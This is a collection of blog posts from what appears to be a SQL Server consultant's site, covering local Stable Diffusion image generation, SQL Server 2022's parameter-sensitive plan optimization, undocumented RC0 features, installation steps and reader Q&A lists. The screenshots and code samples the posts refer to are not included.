Oof: welcome to biased artificial intelligence. If the model is trained on images and data that are mostly white males, and if you’re not specific about the subject of the art, then guess what kind of output you’re going to get? All white males with facial hair.

If you specifically *ask* for diversity, you can get it, but it’s up to you to do that. For example, if you prefix that prompt with “minority female”, then you get:

But again, if you want more diversity than that, you have to be more specific and ask for things like specific races. <sigh> Bias in artificial intelligence is a big issue, something scientists will be working on for the years to come. I just feel like I can’t talk about AI-generated images without at least mentioning that topic.

How to generate images yourself

Database administrator?

There are a bunch of cloud-based AI illustration tools like DALL-E, but most of them cost money or limit you to a certain number of attempts per day. I say “attempts” because a lot of times, when you put in a prompt, you’re not going to get an image you’re happy with. For example, if you just prompt “database administrator”, you get racks of servers in a data center.

It’s going to take a lot of attempts to get the kind of output you’re looking for. Therefore, I wanted to run it locally on my own laptop to get unlimited attempts with quick turnarounds.

Here’s what I used:

  • NVidia graphics card with at least 6GB RAM – I’m using my gaming laptop, an Asus Zephyrus with an RTX 3060 and 6GB RAM. 512×512 pixel images generate in about 20 seconds.
  • Stable Diffusion GRisk GUI 0.1 – free Windows app based on the open source Stable Diffusion, but requires no knowledge of how any of this stuff works. It just works, out of the box. 3GB download, requires about 7GB of drive space. Danger: this GUI is a closed source app from a stranger, and no verifiable way to reproduce it, which means it could be doing anything, like malware or mining Bitcoin. If you’re willing to roll up your sleeves, there are safer but more complex ways to run it.
  • Stable Diffusion prompting cheatsheet – if you just put in “database administrator”, you get garbage. You need to be as descriptive as possible, and that’s where prompt engineering comes in. For much more details, check out the Stable Diffusion Akashic Records.
  • Lexica.art – examples of generated art, AND – here’s the important part – the prompts that created them. (The prompts are on the left – that’s not immediately obvious.)
  • /r/StableDiffusion – extremely active SubReddit.

I played around with Stable Diffusion a lot this weekend, and it’s incredibly addictive. The biggest problem by far is that you’re going to have an idea, put that prompt in, and say to yourself, “Well, that’s interesting… but if I just change a few keywords, I can make it way better.” And then next thing you know, an hour has gone by.

Here’s how my workflow goes:

  • Start with a set of keywords, and generate a bunch of images (like say 10 or 50.)
  • Find the ones you like, and note their seed numbers. Normally, Stable Diffusion takes -1 as a seed, which means generate a random seed. However, if you pass a specific seed number in again, but tweak your keywords the second time around, you can modify that image. For example, you can change the art style, or refine the keywords to make that image better represent what you’re looking for.

Happy playing! Did I say playing? I meant documenting. Yeah. You’re doing important research.


PSPO: How SQL Server 2022 Tries to Fix Parameter Sniffing

Parameter sniffing is a notorious problem for Microsoft SQL Server because it tries to reuse execution plans, which doesn’t work out well for widely varying parameters. Here’s a primer for the basics about how it happens.

SQL Server 2022 introduces a new feature called Parameter Sensitive Plan optimization. I’m not really sure why Microsoft capitalized the first three letters sometimes and not others, or why they only abbreviate it as “PSP optimization” – as long as we’re abbreviating, why not call it PSPO? Optimization is the word in there with the most syllables – why the hell would we leave that one as the one that isn’t abbreviated?

Because I make things go faster for a living, we’re gonna call it PSPO. You’ll see how I pronounce it later, and why.

We’ll pick up from that primer blog post, but this time around we’ll put the database in SQL Server 2022 compatibility mode, which enables PSPO.

When I run it for @Reputation = 2, hardly any users match:

The actual execution plan has some new stuff in SQL Server 2022:

Up near the top of that screenshot, if you look closely at the query, the query itself has been modified. SQL Server has added an “option” hint. Here’s the full text of the modified query:

Let’s dig into how this works.

What option plan per value means

When SQL Server compiled the query plan for the first time, it noticed that we were doing an equality search on the Users.Reputation column, and noticed that different parameters for that value might produce dramatically different numbers of rows. That explains the “predicate_range” part.

SQL Server realized:

  • Some parameters might produce less than 100 rows
  • Some might produce 100 to 1,000,000 rows
  • Some might produce over 1,000,000 rows

So SQL Server will build a small, medium, and large query plan for this one query, using different plans depending on the parameter that gets passed in. That’s pretty spiffy because the plan isn’t hard-coding specific parameter values – instead, each time the plan gets executed, SQL Server will look up that parameter in the statistics histogram and choose the small, medium, or large plan based on the value it guesses from the histogram.

To see what goes into the plan cache, let’s clear the cache, run the query, and then check the plan cache’s contents with sp_BlitzCache:

sp_BlitzCache shows that the outer stored procedure has been executed one time, and the inner statement has been executed once:

That’s kinda slick because it means SQL Server only put the medium-sized plan into cache. It didn’t build the small or large plan because it didn’t need to yet – those haven’t been executed yet, and they might never be executed.

Let’s execute the large data version, Reputation = 1. That produces a ton of rows because everybody gets 1 point when they first open their account:

The actual plan is a parallel table scan:

And SQL Server rewrote the query text to include a different QueryVariantID:

And the plan cache shows that the outer proc has been executed twice, with both the medium and large query being executed once each:

If you only read this far, and only do a short demo like that, it seems like Microsoft made huge leaps in solving the parameter sniffing issue. PSPO enables us to cache up to 3 execution plans per query – a small, medium, and large plan – and chooses between them at runtime. That’s how it’s going to look from conference stages as Microsoft brags about the effectiveness of this feature.

But let’s dig just a little bit deeper, and there are small, medium, and large problems.

Small problem: we still have sniffing.

Try running it for, say, Reputation = 3 and review the actual query plan:

Reputation = 3 reuses the query plan we built for Reputation = 2 – scroll up to the earlier screenshots if you wanna double-check my work. Note that SQL Server only estimated that it’d find 9,149 rows – that’s because the medium plan sniffed the first value it was called with, Reputation = 2.

Reputation = 3 brings back 21x more rows than Reputation = 2 did, so it reads more logical pages than there are in the table, only goes single-threaded, and the sort spills to TempDB.

If we free the plan cache, and then run it for Reputation = 3 first:

Then the “medium” plan is built with a parallel scan plan with a big memory grant, which works beautifully for Reputation = 3. However, it doesn’t work as well for Reputation = 2:

Which leaves that giant memory grant on the floor and generates a ton of CX% waits because the estimate is now 21x off in the other direction.

SQL Server 2022’s PSPO implementation doesn’t fix parameter sniffing – it amplifies the problem, because now we have more possible execution plans in memory, each of which gets sniffed. In most scenarios, I think this is still going to be a net win, because the small and large plans will likely be way less vulnerable to extreme performance emergencies. The medium plans will still be just as vulnerable.

Medium problem: direct equality searches only.

The PSPO implementation is more of a down payment than a full payment. It only works for equality searches, not range searches. One of the most common parameter sniffing problems is the date range issue: queries with start & end date parameters, like this.

PSPO doesn’t add the option hint to the query here:

Because PSPO is coded for direct equality searches only.

By direct, I mean direct comparisons to a column with known huge variances in cardinality. For an example of an inequality search, let’s take a table that has a lookup table: the Posts and PostTypes table. Stack Overflow stores all kinds of things in the Posts table, and they’re identified by their PostTypeId:

Questions and Answers are by far the most popular PostTypes:

So given that I’ve got an index on PostTypeId, which means we also have statistics on PostTypeId, this query could get different plans for different parameters:

Sadly, it does not, because PSPO doesn’t trigger here either – note that PSPO didn’t add an option hint on the query:

Note the wiiiiildly incorrect estimates on the number of Posts that will match. SQL Server’s using the density vector there, optimizing for the average PostTypeId rather than any specific one. PSPO won’t go so far as to:

  1. Fetch the PostTypeId for ‘PrivilegeWiki’, then
  2. Look up that PostTypeId in the statistics on the Posts table, then
  3. Notice that there’s a large skew by PostTypeId, and build different plans

Nope – that’s too much work for the PSPO implementation, at least in v2022.

Large problem: monitoring software is doomed.

If you look closely at the sp_BlitzCache screenshots, there’s a huge, massive, giant, unbelievably big new problem:

In the “Query Type” column, the two PSPO-generated queries just say “Statement.” When you’re looking at queries and plans – whether you’re looking at the plan cache, or sp_WhoIsActive, or your monitoring tools, or Query Store as Erik Darling demos – SQL Server can no longer tell where the query came from. It’s like every running statement is suddenly dynamic SQL with no parent.

For example, if you look at the query plan for a stored procedure that’s been “optimized” by PSPO, you get:

If you think that’s bad, there’s no way to join to the underlying statements. That’s not just bad, it’s poor. Really, really poor.

Going into SQL Server 2022 compatibility level simply breaks query performance monitoring.

And it looks bad even in shades.
I call ’em like I see ’em.

When the first previews of 2022 dropped, I played around with this feature and thought, “There is absolutely no way they’d ship something this broken.” I just kinda shrugged and moved on. But now, today, it’s heartbreaking to think this is the way the feature’s going to ship.

That’s PSPO.

Pronounced pss-poh, as in piss-poor.

I love the idea of parameter-sensitive plan optimization. It’s a great idea. Done correctly, this would make database apps go faster and reduce the troubleshooting involved when they’re having performance issues.

But this, this is just a PSPO implementation.


What’s New in SQL Server 2022 Release Candidate 0: Undocumented Stuff

SQL Server 2022
24 Comments

Microsoft has an official list of what’s new in 2022 overall, but here I’m specifically focusing on system objects that might be interesting to script developers like you and I, dear reader.

New stored procedure sp_get_table_card_est_and_avg_col_len – I assume the “card” refers to statistics and cardinality, not Hallmark. SQL Server has historically struggled with memory grants because it uses datatype size to budget memory grants, and bigger-than-necessary data types (like NVARCHAR(MAX)) have led to larger-than-necessary grants. It’d be cool if this proc was a down payment to mitigate that problem, but I have a sinking feeling it has to do with external data sources. I would tell you more about it, but when I run it, I get:

New view sys.dm_tran_orphaned_distributed_transactions – every now and then, I’ve run across Availability Groups replicas with problems due to orphaned distributed transactions consuming DTC resources or holding locks. This new undocumented DMV might be a down payment to resolve that problem. I don’t have an easy way to reproduce the problem quickly, so I can’t demo it.

New view sys.database_automatic_tuning_configurationsthis one’s a little odd because Books Online tells me it’s been around since SQL Server 2017, but I don’t remember seeing it before, and it’s not in my 2019 test instances. Tells you if Force_Last_Good_Plan is on, and I would imagine that down the road, as more automatic tuning options might come out over the next several releases, this might have more info.

New Query Store DMV columns – now that Query Store is starting to work on read-only replicas, looks like they added plan_persist_plan_feedback.replica_group_id, plan_persist_query_hints.replica_group_id to support those goals. Plus plan_persist_plan_forcing_locations gets columns for timestamp and plan_forcing_flags.

New spinlock troubleshooting – sys.dm_os_workers gets columns for spinlock_wait_time_ms, spinlock_max_wait_time_ms, and spinlock_wait_count.

New stuff to support offloaded compression

This stuff needs its own section. RC0 introduced the ability to offload compression to Intel processors equipped with QuickAssist.

We get new sp_configure options for ‘hardware offload mode’ and ‘backup compression algorithm’. By default, these are off. To turn on offloaded compression, install the Intel QAT drivers, then do an alter:

Which returns:

After restarting the SQL Server, check this brand spankin’ new DMV:

And, uh, on my VM, it’s still not enabled:

Because you can enable it even on processors that don’t support it, which strikes me as kinda odd. I suppose you would want to make it part of your standard build, and then whenever it’s available, it’ll get used, assuming you call for offloaded backup compression in the right way.

New messages in RC0

In each release, I check sys.messages for new stuff. Some of this stuff gets added for the cloud, like Azure SQL DB or Managed Instances, so read these with a grain of salt. Here’s what’s new in RC0, new from the last CTP:

  • 1136: The tempdb has reached its storage service limit. The storage usage of the tempdb on the current tier cannot exceed (%d) MBs.
  • 5373: All the input parameters should be of the same type. Supported types are tinyint, smallint, int, bigint, decimal and numeric.
  • 5374: WITH clause is not supported for locations with ‘%ls’ connector when specified FORMAT is ‘%ls’.
  • 16722: Cannot change service objective for %ls to %ls as long-term retention is not supported yet on Hyperscale. Please disable long-term retention on the database and retry
  • 17414: Retrieving the address of an exported function %.*ls in accelerator library %.*ls failed with error 0x%x.
  • 17415: %.*ls component enumeration failed with zero component count.
  • 17416: %.*ls component enumeration failed with mismatch in component count.
  • 17417: %.*ls %.*ls not compatible with SQL Server.
  • 17418: Detected %.*ls %.*ls.
  • 17419: %.*ls hardware detected on the system.
  • 17420: %.*ls hardware not found on the system.
  • 17431: %.*ls initialization failed with error %d.
  • 17432: %.*ls initialization succeeded.
  • 17433: %.*ls session creation failed with error %d.
  • 17434: %.*ls session sucessfully created.
  • 17435: %.*ls will be used in hardware mode.
  • 17436: This edition of SQL Server supports only software mode. %.*ls will be used in software mode.
  • 17437: %.*ls will be used in software mode.
  • 17438: %.*ls session alive check failed with error %d.
  • 17439: %.*ls session tear down failed with error %d.
  • 17440: %.*ls session close failed with error %d.
  • 17441: This operation requires %.*ls libraries to be loaded.
  • 19713: Statistics on virtual column are not avalable.
  • 19714: Number of columns in PARTITION clause does not match number of partition columns in Delta schema.
  • 21093: Only members of the sysadmin fixed server role or db_owner fixed database role or user with control db permission can perform this operation. Contact an administrator with sufficient permissions to perform this operation.
  • 22786: Synapse workspace FQDN is not in the list of Outbound Firewall Rules on the server. Please add this to the list of Outbound Firewall Rules on your server and retry the operation.
  • 22787: Change feed table group limit of %d groups exceeded
  • 22788: Could not enable Change Feed for database ‘%s’. Change Feed can not be enabled on a DB with delayed durability set.
  • 25755: Could not create live session target because live session targets are disabled.
  • 31633: The length of the provided %ls exceeds the maximum allowed length of %u bytes.
  • 31634: The %ls must contain a ‘%ls’ for use with managed identity.
  • 31635: The %ls’s ‘%ls’ value must be a %ls for use with managed identity.
  • 31636: Error retrieving the managed identity access token for the resource id ‘%ls’
  • 33547: Enclave comparator cache failed to initialize during enclave load.
  • 39057: The value provided for the ‘%.*ls’ parameter is too large.
  • 39058: The parameter ‘%.*ls’ has a type that is not supported.
  • 45770: Failed to move the database into elastic pool due to internal resource constraints. This may be a transient condition, please retry.
  • 46552: Writing into an external table is disabled. See ‘https://go.microsoft.com/fwlink/?linkid=2201073’ for more information.
  • 46553: Create External Table as Select is disabled. See sp_configure ‘allow polybase export’ option to enable.
  • 46953: Pass through authorization using S3 temporary credentials is not supported. Please use S3 credentials to access storage.
  • 47507: Adding memory optimized files to the database replicated to Azure SQL Managed Instance is not supported because its service tier does not support In-memory OLTP capabilities. Consider replicating database to managed instance service tier supporting In-memory OLTP capabilities.
  • 47508: Adding multiple log files to the database replicated to Azure SQL Managed Instance is not supported because managed instance does not support multiple log files.
  • 47509: Adding FileStream or FileTables to the database replicated to Azure SQL Managed Instance is not supported because managed instance does not support FileStream or FileTables.
  • 47510: Adding multiple memory optimized files to the database replicated to Azure SQL Managed Instance is not supported because managed instance does not support multiple memory optimized files.

If any of those messages are interesting to you, feel free to leave a comment about it.

New database-scoped configuration options

These are all new since SQL Server 2019 – some were introduced in prior CTPs, but I’m mentioning them all here because there’s good stuff in here for query tuners:

  • 25 – PAUSED_RESUMABLE_INDEX_ABORT_DURATION_MINUTES
  • 26 – DW_COMPATIBILITY_LEVEL
  • 27 – EXEC_QUERY_STATS_FOR_SCALAR_FUNCTIONS
  • 28 – PARAMETER_SENSITIVE_PLAN_OPTIMIZATION
  • 29 – ASYNC_STATS_UPDATE_WAIT_AT_LOW_PRIORITY
  • 31 – CE_FEEDBACK
  • 33 – MEMORY_GRANT_FEEDBACK_PERSISTENCE
  • 34 – MEMORY_GRANT_FEEDBACK_PERCENTILE_GRANT
  • 35 – OPTIMIZED_PLAN_FORCING
  • 37 – DOP_FEEDBACK
  • 38 – LEDGER_DIGEST_STORAGE_ENDPOINT
  • 39 – FORCE_SHOWPLAN_RUNTIME_PARAMETER_COLLECTION

That last one’s particularly interesting to me because SQL Server 2019 originally shipped in a way that you could see runtime parameters in sys.dm_exec_query_statistics_xml, and then they turned it off around CU11-12 without documenting the changed behavior. That was a total bummer, because that feature was a lifesaver for troubleshooting parameter sniffing. I’m hoping we can get that back again.


How to Install SQL Server 2022 Release Candidate 0

SQL Server 2022
0

SQL Server 2014’s end of support date is coming in less than two years: July 9, 2024. I know that sounds far-off right now, but consider the work you have to do between now and then:

  • Pick a new version to migrate to
  • Set up development SQL Servers for that new version
  • Start developing & testing with it
  • Get users to sign off that it’s working as expected
  • Design your high availability & disaster recovery strategies for it (something I recommend folks revisit with each new release)
  • Set up production/HA/DR SQL Servers
  • Migrate over to the new servers

With that in mind, if you’re still running SQL Server 2014 today in production, now is the time to start moving your development servers over to the newer SQL Server version. I’ve got a post on which SQL Server version you should use, but if you’re just now starting a 2014 replacement plan, then you’re the kind of shop that doesn’t upgrade very often. (Which is cool! Change = risk.) In that case, I’d think about using SQL Server 2022 to get the longest lifespan you can out of your SQL Servers.

The first release candidate for Microsoft SQL Server 2022 is out, so let’s see what’s involved with installing it.

Start with a fresh, empty Windows VM for testing. Never install test/evaluation bits on your laptop or an existing SQL Server – it’s a recipe for trouble. Pre-release bits (and even release bits!) can cause side-by-side existence problems that you don’t want to have to waste time troubleshooting.

When the Windows VM is ready, download the installer here. When you run it, the Installation Center opens:

SQL Server Installation Center

Click the Installation tab at left:

And for a standalone evaluation/development server, click the first line for a new standalone installation. (Most of the rest are just hyperlinks to go download other things that aren’t included in the SQL Server installer.)

The installer launches, and it’s time to choose your character:

Your choices:

  • Evaluation Edition – just like Enterprise, but it times out after 180 days.
  • Developer Edition – just like Enterprise, no time bomb, but isn’t allowed to be used for production purposes. Frankly, you’d be suicidal to use Evaluation Edition for production purposes too, since it has that time bomb. You wanna choose Developer because your evaluation period is probably going to extend beyond 180 days, and you don’t wanna have to worry about time bombs.
  • Express Edition – only for tiny databases.

Choose your character – I’m going with Developer – and then hit next.

Let’s not pretend you’re going to read that, but I’ll point out one amusing section:

The $5 limit is because starting with SQL Server 2022, Microsoft is using Fiverr for development, testing, and support. The most they can get back from Fiverr for a refund is the $5 they spent on the contractor, so they gotta cap their losses. Otherwise, they’d go bankrupt from KB4538581 alone.

Accept the terms, and hit Next, and the installer will do some basic validation to make sure the VM is in a safe place:

In my case, the Windows Firewall warning is because Windows Firewall is enabled. If you click the Warning link, you’ll get instructions to set up an exclusion rule to let SQL Server traffic pass through the firewall. If you plan to test apps hitting this server, make a note that you’ll need to change the Windows Firewall settings later – but you can ignore this for now during setup, and circle back to it later.

When you hit Next, you get the first new screen:

As strange as it may seem, Microsoft is on a mission to get even more money out of you than just the SQL Server licensing costs. They want you to pay ongoing fees to use Azure services to manage your SQL Servers, regardless of where they live. If you want to burn money, buy candles.

Me personally, I can’t afford that and it’s irrelevant to my testing, so I’m going to uncheck that and click Next. Now, it’s time to pick features.

Install as few features as practical. Every box you check here has a performance cost. Many of them will consume CPU and memory even when they’re not being actively used.

The Features list in that screenshot looks like it’s cut off, like there’s more stuff below “Redistributable Features”. In RC0, there’s nothing else to see – there’s nothing below that. It’s a bug. What, you thought the product was ready? Buckle up, bud – it’s the first of many.

In that feature list, the only thing I’m going to check is Database Engine Services. I’m not a fan of SQL Server’s full text search, although I understand why people use it. Wanna check any other box on a production SQL Server? You should pause for a moment and reconsider the life choices that brought you here. Wanna check them just because it’s a dev box? Bad idea: if you make something available in development, then developers will come to rely on it, and then they’ll build code atop it, and need it in production. In terms of features, treat your dev servers like production.

After checking the Database Engine Services box, the Instance Root Directory option will light up:

You can leave that one on the C drive – that’s fine. We’ll set the data & backup locations in subsequent steps. Click Next.

You can install multiple instances of SQL Server on the same Windows VM. I’m actually going to choose Named Instance because I need this for something else I’m doing, but you should leave it on Default.

When you click Next, there will be a significant pause before the next screen appears:

If you’re installing just for the purposes of testing 2022, you can stick with these service account names. Check the box for Grant Perform Volume Maintenance Tasks – that’s Instant File Initialization, which helps restore databases much more quickly. That’s important when you’re doing testing on new versions.

If your application needs case sensitivity or a different collation, click the Collation tab:

If you’re testing to replace an existing server, connect to that server with SQL Server Management Studio. Right-click on the server name, click Properties, and the existing server’s collation will be listed on the properties screen:

Back on your SQL Server 2022 setup, choose the collation that matches your existing production server, and click Next.

On the Server Configuration tab, the first decision you have to make is whether to allow SQL authentication. Over time, trends have gone back & forth as to whether this was a good idea. We were trying to stamp it out for a while, but then Azure SQL DB came out and it didn’t support Windows auth, so Microsoft had to backtrack the idea that SQL authentication was bad. These days, Azure SQL DB supports Windows auth (although it’s often a pain in the rear), so “experts” are all over the place as to whether or not you should have it on.

Most of the apps I interact with require it, so I’m going to set Mixed Mode, and then set a strong password for the SA account.

You have to take action in the “Specify SQL Server administrators” box. If you don’t, nobody’s going to be an admin on the instance, and you’re going to be in a world of hurt when you go to actually use this server. At bare minimum, add yourself by clicking the “Add Current User” button, which will take a few seconds. For real production purposes, you’ll want to use an Active Directory group consisting of database administrators.

Click the Data Directories tab, and you’ve got some work to do:

You have to take action here too. If you leave the “Data root directory” to be the OS boot drive, then sooner or later someone’s going to create or restore a database, pour a lot of data into it, and run the OS boot drive out of space. Choose a different volume for the database files to live.

I’m using a server with a Z drive, so after I type in “Z:\” in that top box and hit Tab, here’s what my screen looks like:

For my purposes, that’s fine. Click the TempDB tab:

If you have standard file sizes that you use, feel free to change those. For me, 8MB file size and 64MB autogrowth is awfully small. Even on dev/test servers, I go with 1024MB initial size and autogrowth sizes for both data and log files, like this:

Then click the MaxDOP tab:

SQL Server’s gotten a lot better over the last couple of releases at setting the right Maximum Degree of Parallelism (MaxDOP or MAXDOP, depending on where in that screenshot you look – consistency is the hobgoblin of little minds.)

Click the Memory tab:

Click the Recommended radio button, or else SQL Server will drain your memory dry. Just as a side note, Max Server Memory doesn’t actually mean the maximum – there are things SQL Server will use memory above and beyond that maximum. We’re just setting a ceiling to make sure things don’t go absolutely crazy.

Don’t click the FILESTREAM tab. I know it’s in all caps, which means Microsoft is yelling at you, imploring you to use SQL Server as a really expensive file server. It’s a bad idea. Save your lunch money, and put files where they belong.

Click Next, and decision time is over – just click Install:

After installation finishes, you can use SQL Server Management Studio to connect. You don’t have to download a new version – SSMS 19 isn’t required.


[Video] Office Hours: Ask Me Anything About SQL Server

Videos
0

Post your Microsoft data platform questions at https://pollgab.com/room/brento and upvote the ones you’d like to see me answer. I sat down by the pool in Cabo with a cup of coffee to go through ’em:

Here’s what we covered in this episode:

  • 00:00 Introductions
  • 00:43 MergeItLikeItsHot: Hi Brent, do you have any good resources to look at when planning DR procedure for sql server and for Azure sql database specifically?
  • 01:46 Neil: whats your approach to automating restores from prod to test ? how do you select the last backup ? currently i set up a linked server to query msdb on the prod server and find latest backup history. but i want to get rid of all linked servers. is there a better way ?
  • 04:00 Donovan: Is SQL lock pages in memory a best practice or edge case for modern SQL Server and Windows OS? If edge case, when should it be used?
  • 06:06 Trushit: Were you always fluent and comfortable speaking in front of a camera? Any tips for someone who feels awkward ? Even when I listen to the recording of own voice, it sounds so different, in a bad way, than what I hear when I am speaking to someone else.
  • 08:20 CJ Morgan: Have you ever worked w/Bidirectional replication? I ask because we have a client that wants an updateable copy of their database up in Azure and aside from a VM running SQL in Azure, the only replication we see as being supported for and updateable “subscriber” is Bidirectional.
  • 10:00 Eduardo: Do you keep any interesting stats on the questions that are asked each episode (e.g. percent of questions that are new each episode, percent of questions for topic ABC, etc)?
  • 10:20 ILoveData: Hello Brent, just curious what the ad revenue on your small YouTube channel looks like. Is that something you would be willing to share?
  • 11:15 Haydar: Does high VLF count / large transaction log file size affect log shipping performance?
  • 13:13 Seshat: What are the pros / cons of using native SQL backup with multi terabyte DB’s (11+ terabytes)?

Your Turn: I’m Not Answering These 13 Office Hours Questions

Normally, after I do a round of Office Hours of going through the questions that got posted at https://pollgab.com/room/brento, I answer the highly upvoted ones and then clear the queue. If y’all didn’t upvote questions, then I don’t answer ’em.

However, today I’m trying something different: I’ll post the non-upvoted questions here for y’all to see if there’s something you want to answer in the comments. I’ll number ’em so y’all can refer to ’em easier in the comments.

  1. GI Joe DBA: Thoughts on contract to hire jobs? I don’t like them, I want to be hired FT immediately. I think agencies use them to squeeze $$ from the placement but, there’s no guarantee I will be hired and it’s a hassle switching benefits. I’ll only consider it if pay is higher than average.
  2. lockDown: Hi brent, we work on a multitenancy model sql DB and we need to split the data to 2 Dbs, since there multiple apps writing to the DB & the Devs are asking for a schema lock on the (2k) schemas that will be moved. I feel like stoping writes should be done on the App am i right?
  3. Jarkko: Should there be any concerns when a query runs in 2 seconds but consumes 16 seconds worth of CPU time (SQL 2019 Enterprise, 64 cores)?
  4. RonS: Hello Brent, Moving to 2019 SS Standard/HA. 7 databases that need to talk with each other. Standard edition requires each DB to have its own IP address. Current environment all the DB’s live in one server and can see each other (db.schema.table). Linked servers right direction?
  5. CPL: Hi Brent .. What is the process that actually updates indexes? e.g. table with 3 NC indexes & all three indexes contain Col1. If one of these indexes is used where we then update Col1 how are the other 2 indexes subsequently updated? Is it still via the transaction log?
  6. Wenenu: What are the top SQL index naming schemes you see in the field? How did the various schemes originate?
  7. Anatoli: CONTAINSTABLE and FREETEXTTABLE seem to hide the logical reads when statistics io is enabled. Is there an alternate way to see the logical reads incurred by these TVF’s? Using SQL 2019 – 2014 compat mode
  8. Sebastian: How would you change SQL Sentry Plan Explorer to make it more usable / friendly?
  9. DBA_preparing_for_jobsearch: Could you suggest a good strategy on improving left anti semi joins?
  10. Least Significant Who In Whoville: Hola mi amigo. I am the sole DBA at a recently acquired adult beverage manufacturer and our new controlling company. Do you have any suggestion on how to break the news that their adhoc architecture is one mistake away from disaster when their shadetree DBAs know more than me?
  11. Itching to Emigrate: Is it true that Americans in Europe working remotely for American companies fall under GDPR? Can you point us to resources for this question? Everything I see only looks at the consumer side of GDPR.
  12. reps_for_bulk_deletes: For “Full” recovery model, how much bigger than a row of data is the log entries associated with the deletion of that record? Trying to come up with a heuristic for when to approach alternate deletion methods by looking at remaining space in log and on log disk.
  13. BlitzFan: Hi Brent, At our shop we make all kind of backups, SQL backups, Avamar backups of SQL backup shares and of entire databaseservers. But we never test those Avamar backups, so no disaster recovery tests and no disaster recovery plan. What would you say to management?